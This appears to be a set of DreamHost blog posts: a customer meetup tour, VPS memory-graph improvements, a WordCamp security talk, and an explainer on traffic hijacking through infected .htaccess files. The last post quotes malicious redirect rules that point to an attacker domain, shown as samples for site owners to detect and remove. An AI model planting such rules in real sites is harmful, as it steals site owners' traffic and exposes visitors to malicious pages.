DreamHost wants nothing more than to reach out and touch you – in six very specific areas.

(With cocktails first, of course – we are not savages.)

Our Reach Out & Touch You Tour is making its way across the United States stopping in the six cities that, worldwide, contain the most DreamHosters.

You’ll have us all to yourself for a few hours – It’s like a dream come true!

Granted, it’s nerdy dream where you go on a date with your web host, but still…DREAMY!

We can’t wait for you to whisper sweet nothings into our ears about what you do (and don’t) like about your current DreamHost experience. We’ll whisper back answers to any of your questions – we’ve got no secrets!

Appetizers and drinks will be provided at these 21-and-over events, and a lasting memento of the evening’s escapades will be provided to everyone in attendance. Regardless of what you may have heard, the memento will not require a round of antibiotics to fully appreciate.

Our tour kicks off this Thursday in Los Angeles. A few tickets for LA are still available and will be until Wednesday afternoon.

Tickets are also now available for Portland, Chicago, and Seattle!

New York and San Francisco wrap up our tour in May and tickets for those two events should be available soon.

Let’s both plan on letting down our defenses for one wild night to let Love in. We want to take a swim in Lake You and can only do that if your heart is open.

We hope you’ll come out and let us touch you. We hope that by the end of the night you’ll have touched us. We want to break down the barriers that have kept web host and customer so very distant over the years. We’re all just people when you get right down to it, and we all yearn for a deep emotional contact that’s been lacking in our relationship so far. Let’s make things right.

On an unrelated note, please leave all weapons at home.

Reach Out And Touch DreamHost!

Scalable Virtual Private Servers from DreamHost are a great way to ensure that you’re never paying more or than you need for your hosting.

You might want more power than shared hosting can provide, but may not really need the resources and cost associated with a dedicated server. With a VPS from DreamHost you can scale your hosting’s available memory allocation in real time and immediately see how those changes affect the bottom line.

And how do you know how much memory you actually need?

Whelp, we provide all VPS customers with memory usage graphs to show exactly what your site’s been up to.

This is what they looked like:

Pretty great, right? We think so. Or we used to, anyway. Turns out they weren’t exactly helpful in the way that you really needed them to be.

We were giving you a single data point to explain your memory usage – what’s known as the resident set size. While that data is useful, the RSS represents just a portion of your overall memory usage – it’s really not enough data to make informed decisions about resource allocation.

Our new graphs look like this:

We’re now showing memory usage trends across your RSS (“Actual Memory”), memory used by your disk cache (“Cached Memory”), and the sum of both RSS and disk cache (“Total Memory”). That Total Memory line is really a much better indicator of where you’ll need to be.

Please note that applications can reclaim memory from cache until their RSS hits the memory limit that you’ve specified – much like any other Linux system.

We capture snapshots of your VPS metrics every 15 minutes. We’re working hard to increase the interval at which we sample data, and some progress on that particular enhancement is already in the works.

We’ve also revamped some code that will adjust and tune Apache and Nginx configurations appropriately based on your specified memory allocation. These modifications should help to improve memory management somewhat to reduce the likelihood of out-of-memory conditions. The end result is that any sudden spikes in memory usage should now occur much less frequently and be handled a bit more gracefully when they do.

We still have more plans for making our VPS reporting even better, but we wanted to get these improvements out the door to make sure our VPS customers had the best data available as quickly as possible.

We hope this helps!

Attending WordCamp Phoenix?  If you said yes or nodded your head or did anything else to insinuate that you will be going then you must pencil in time to hear our very own Robert R. speak.

What will he be speaking about? Security 101, only one of the most important things to help you protect your WordPress site.

When will he be speaking?  Saturday Feb 25th at 4:15pm on the Jumpstart Track.

Here is more info on the WordCamp schedule:

http://2012.phoenix.wordcamp.org/schedule/saturday/

If you are lucky you might even get to meet another member of our DreamHost team…We call him Shredder and he knows A LOT about WordPress so I would look for him.

Robert R. was kind enough to take some time out of his day to answer a few questions that I thought would be helpful for all of you attending.

M: Tells us a bit more about what you are speaking about at WordCamp Phoenix:

R: The presentation at WordCamp Phoenix will be covering the basics of security and how you can apply them to your WordPress websites.  As well as cover a bit into the topic about what attacks we see on our network every day, and how easy it is for site owners to prevent from becoming victims of a compromise.

M: Sounds great!  Can attendees ask for your autograph?

R: No, but they can feel free to ask for my PGP/GPG key!

M: What do you like about WordPress?

R: WordPress is a fantastic content management system, but honestly the best thing I’ve seen was @photomatt getting personally involved in matters of WordPress security when new attacks are involved.

M: Last but not least, are you looking forward to eating anything delicious in Phoenix?

R: I like to go to restaurants that are good at whatever kind of food they do and I hear they have some good BBQ in Phoenix!

There you have it guys, security 101, no autographs and take him out for some BBQ!

Hope to see you all on February 25th!

There have been some recent allegations stating that a handful of compromised websites on our network involved with domain traffic “hijacking” was somehow connected to the illegal intrusion in January that caused us to initiate a complete password reset of all FTP and SSH users.

An extensive investigation has revealed that no customer FTP or SSH user accounts have been maliciously accessed due to this password breach. The websites reported as involved with this traffic hijacking have been reviewed and the site owners notified of the issue on their sites.

Domain hijacking has been around as long as web apps have existed, and until bug-free software exists, it will continue to trouble website owners for some time to come. We wanted to explain exactly what is meant by “hijacking” to help clear up some confusion.

Have you ever wondered, “Why would anyone try to hack my website?” Many answer this by presuming they’re too small of a target to become a victim of a high-tech crime syndicate, but truth be told these criminals want your sites and they want them badly. Why? Well it all comes down to money. The more hosts they have compromised, the more money they can make.

Cyber criminals’ main intent is to hit a site and go unnoticed…until it’s time to cash out. Attackers don’t care how big or small you are, and it is more likely that a site that is run by a small business or single site owner is going to not only be behind on their security updates for any software running on their site, but it’s also unlikely that they regularly monitor their site for malicious activity.

The “cash out” phase is usually when of our customers first find out that they’ve been compromised. By that time their site(s) are now taking part in one or more unscrupulous online activities. We will be doing a short series of posts that cover methods these attackers use as well as what you should be on the look out for.

Today we will be going into just one of these attacker’s malicious actions, so you know a little more about what to look for.

Traffic theft: via infected .htaccess files.

If you notice your site’s traffic unexpectedly dropping, or perhaps you’ve been flagged by Google as having “malicious” content, then there’s a good chance your site has been compromised.

What the attackers may have done is setup or infected your existing “.htaccess” file on your site. .htaccess files are read by your web server to govern the way your site behaves. .htaccess files can be created with rules that will steal your legitimate traffic and send the visitor to an attacker’s malicious URL. This attack originated with by simply infecting a site’s pages via iframe tags, but it has since evolved to utilize .htaccess “RewriteRule” and “ErrorDocument” directives.

Here is a simple example:

ErrorDocument 403 hxxp://congatarcxisi.ru/mays/index.php
ErrorDocument 404 hxxp://congatarcxisi.ru/mays/index.php

And here is a more complicated one:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|…
RewriteRule ^(.*)$ hxxp://congatarcxisi.ru/mays/index.php [R=301,L]

(to explain the above, the attackers are basically taking any search engine traffic, and redirecting it to their site)

You can check for these types of infections on your own! Just review your site’s .htaccess files (you may need to enable viewing of hidden files in your FTP/sFTP client so you can view “.htaccess”.) We are already actively scanning for these infections on our customers sites, so if you see an email from our Security team please make sure you review the report and take the recommended actions.

Based on the sites we have cleaned up already, these attacks have almost universally been due to insecure website software running on the site in question. You could have the best passwords in the world, but if the apps you’ve installed on your server have any security vulnerabilities or aren’t kept up to date, attackers can still find their way in.

We are are open to sharing information about web based attacks because we strongly believe in cooperation, collaboration, and responsible disclosure regarding Internet security. If you are interested in providing details related to these attacks or have questions for us, please contact our abuse team with information about any projects you may be working on that may be related to these infections and we will be glad to discuss this matter with you further.

In a follow up post I will cover the life of a web based attack when a new vulnerability is released (from 0day to 1000day), so stay tuned!